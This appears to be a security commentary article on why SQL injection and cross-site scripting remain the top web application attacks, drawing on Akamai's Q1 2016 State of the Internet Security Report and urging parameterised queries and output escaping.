In the beginning – when the web was a dark and primitive space full of ‘under construction’ signs, flaming Java applet logos and faux-mechanical hit counters – a proto-web developer crawled from the World Wide Web’s primordial tag soup and ushered in the future by hooking-up a company database to a company website.
The website was no longer a document, it was an application; complex, sophisticated, interactive, up-to-date, personalised, useful even.
Not long after this epiphany occurred a proto-hacker emerged from the same tag soup, took one look at this fine new creation and tried to attack the company database through the website with a SQL injection attack.
And so it’s been ever since.
On the surface, modern websites have as little in common with their early nineties forebears as a 3D Pixar animation has with a magic lantern show. Under the surface though it’s a different story; the technology has changed but the basic underlying concepts haven’t and neither, sadly, have the most common types of vulnerability.
Ever since websites sprouted input fields, hackers have used them to try their luck.
Instead of entering whatever it is the website is expecting users to type into the input field – a username and password on a login page for example – hackers can try entering code instead; SQL commands for attacking the database or HTML, CSS, Javascript or XSLT for attacking the structure of the site’s pages (so-called XSS or cross-site scripting.)
If websites are properly coded then anything anyone enters in an input field is scrubbed and cleaned until it can do no harm. If websites were properly coded then SQL injection and XSS attacks would have disappeared long ago.
Content distribution giant Akamai has just released its most recent State of the Internet Security Report and it includes a section on web application attack activity.
Top of the list for Q1 2016? SQL injection.
The second and third items on the list, Local File Inclusion and XSS (Cross-site scripting), are as old as the hills too. In fact, if you removed the dates from the report the only clue you’d have about what year the web application attack section was referring to, or even what decade, is the presence of 2014’s Shellshock vulnerability.
And just to be clear, that’s not a criticism of the report. Far from it.
As we edge ever closer to peak hype, with every new vulnerability getting its own logo and PR makeover, we need an injection of perspective.
The Akamai report reminds us that coding a website so it’s protected from the kinds of attack it’s most likely to face is an old story. It’s mostly, about doing some quite basic but unglamorous hard yards, thoroughly.
These attack vectors have remained effective due to coding issues that continue to crop up in websites. [SQL injection] is a problem that can be solved through coding techniques that include security checks. In the rush to move applications to the web layer, however, many companies still do not check for SQLi vulnerabilities and thus leave themselves vulnerable to attack.
SQL injection can be killed stone dead by the simple expedient of using parameterised database queries – but only if you have the discipline to use them everywhere, all the time.
XSS can be eliminated by correctly ‘escaping’ a website’s output (ensuring it’s interpreted as content rather than as language syntax) – but only if you use the right escape syntax, and only if you do it all the time.
That SQL injection, XSS and their ilk have clung to the web like stalactites for all this time has nothing to do with some fiendish inherent mystery or the elite skills of hackers; their staying power is testament to the fact that making a site that isn’t vulnerable takes a bit more time, effort and attention than making one that isn’t.